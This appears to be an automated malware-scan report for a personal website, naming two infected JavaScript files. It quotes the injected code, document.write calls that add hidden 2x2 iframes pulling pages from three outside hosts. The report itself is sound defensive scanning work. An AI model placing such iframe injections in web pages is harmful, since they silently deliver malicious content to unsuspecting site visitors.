Scanned pages/files
Request | Server response | Status |
http://www.seanglynn.co.uk/ | 200 OK Content-Length: 3766 Content-Type: text/html | clean |
http://www.seanglynn.co.uk/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 3829 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=3188812></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3188812></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcd.html?j=1413051&g case "class": case "title": case "accesskey": case "name": case "id": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=3188812 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=3188812> Hidden iFrame found. size: 2x2 src: http://khenpo.ru/ohcd.html?j=1413051 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcd.html?j=1413051> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3188812 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3188812> | ||
http://www.seanglynn.co.uk/Scripts/AC_ActiveX.js | 200 OK Content-Length: 2609 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=3188812></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3188812></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcd.html?j=1413051&g case "width": case "height": case "align": case "vspace": case "hspace": case "class": case "title": case "accesskey": case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } return ret; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3188812 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3188812> Hidden iFrame found. size: 2x2 src: http://khenpo.ru/ohcd.html?j=1413051 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcd.html?j=1413051> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=3188812 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=3188812> | ||
http://www.seanglynn.co.uk/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: seanglynn.co.uk
Result:
GET / HTTP/1.1
Host: seanglynn.co.uk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: seanglynn.co.uk
Referer: http://www.google.com/search?q=seanglynn.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: seanglynn.co.uk
Referer: http://www.google.com/search?q=seanglynn.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=seanglynn.co.uk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://seanglynn.co.uk/
Result: seanglynn.co.uk is not infected or malware details are not published yet.
Result: seanglynn.co.uk is not infected or malware details are not published yet.